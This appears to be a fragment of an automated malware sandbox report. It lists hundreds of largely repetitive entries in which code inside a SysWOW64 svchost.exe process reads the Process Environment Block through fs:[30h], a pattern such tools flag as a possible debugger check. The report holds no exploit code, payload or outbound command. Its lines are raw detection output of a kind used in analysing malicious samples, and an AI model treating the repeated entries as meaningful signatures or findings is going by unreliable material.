                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]
